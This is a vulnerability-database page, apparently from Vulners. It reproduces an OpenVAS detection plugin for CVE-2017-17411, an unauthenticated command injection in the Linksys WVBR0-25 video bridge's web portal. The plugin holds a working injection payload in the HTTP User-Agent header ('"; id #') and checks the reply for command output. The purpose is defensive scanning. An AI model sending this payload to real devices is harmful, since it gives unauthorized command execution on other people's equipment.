Lucene search
+L

Linksys WVBRO25 RCE Vulnerability

🗓️ 22 Dec 2017 00:00:00Reported by Copyright (C) 2017 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 41 Views

Linksys WVBRO25 RCE Vulnerability. Wireless Video Bridge vulnerable to OS command injection, allowing unauthenticated attacker to execute arbitrary code. Firmware version 1.0.41 or earlier affected

Related
Refs
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Linksys WVBR0 - User-Agent Remote Command Injection Exploit
19 Dec 201700:00
zdt
zdt
zdt
Linksys WVBR0-25 User-Agent Command Execution Exploit
4 Jan 201800:00
zdt
attackerkb
ATTACKERKB
CVE-2017-17411
21 Dec 201714:29
attackerkb
circl
Circl
CVE-2017-17411
29 May 201815:50
circl
cnvd
CNVD
Linksys WVBR0 Wireless Bridge Remote Command Execution Vulnerability
15 Dec 201700:00
cnvd
checkpoint_advisories
Check Point Advisories
Linksys WVBR0-25 Command Injection (CVE-2017-17411)
28 May 201800:00
checkpoint_advisories
cve
CVE
CVE-2017-17411
21 Dec 201714:00
cve
cvelist
Cvelist
CVE-2017-17411
21 Dec 201714:00
cvelist
exploitdb
Exploit DB
Linksys WVBR0 - 'User-Agent' Remote Command Injection
14 Dec 201700:00
exploitdb
exploitdb
Exploit DB
Linksys WVBR0-25 - User-Agent Command Execution (Metasploit)
4 Jan 201800:00
exploitdb
Rows per page
# SPDX-FileCopyrightText: 2017 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/o:linksys:wvbr0-25_firmware";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.140625");
  script_version("2024-06-28T15:38:46+0000");
  script_tag(name:"last_modification", value:"2024-06-28 15:38:46 +0000 (Fri, 28 Jun 2024)");
  script_tag(name:"creation_date", value:"2017-12-22 13:48:08 +0700 (Fri, 22 Dec 2017)");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2018-08-28 21:29:00 +0000 (Tue, 28 Aug 2018)");

  script_cve_id("CVE-2017-17411");

  script_tag(name:"qod_type", value:"exploit");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("Linksys WVBRO25 RCE Vulnerability");

  script_category(ACT_GATHER_INFO);

  script_copyright("Copyright (C) 2017 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_linksys_devices_consolidation.nasl");
  script_mandatory_keys("linksys/detected");
  script_require_ports("Services/www", 80);

  script_tag(name:"summary", value:"Linksys WVBRO-25 is prone to a remote code execution (RCE)
  vulnerability.");

  script_tag(name:"insight", value:"The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to connect
  wireless Genie cable boxes to the Genie DVR, is vulnerable to OS command injection in version < 1.0.41 of the web
  management portal via the User-Agent header. Authentication is not required to exploit this vulnerability.");

  script_tag(name:"impact", value:"An unauthenticated attacker may execute arbitrary code.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"affected", value:"Linksys WVBRO-25 prior to firmware version 1.0.41.");

  script_tag(name:"solution", value:"Updated firmware to version 1.0.41 or later.");

  script_xref(name:"URL", value:"https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");

if (!port = get_app_port(cpe: CPE, service: "www"))
  exit(0);

if (!get_app_location(cpe: CPE, port: port, nofork: TRUE))
  exit(0);

req = http_get_req(port: port, url: "/", user_agent: '"; id #');
res = http_keepalive_send_recv(port: port, data: req);

if (res =~ 'uid=[0-9]+.*gid=[0-9]+') {
  report = "It was possible to execute the 'id' command.\n\nResult:\n" +
           egrep(pattern: 'uid=[0-9]+.*gid=[0-9]+', string: res);
  security_message(port: port, data: report);
  exit(0);
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Jun 2024 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 39.8
CVSS 210
EPSS0.87929
41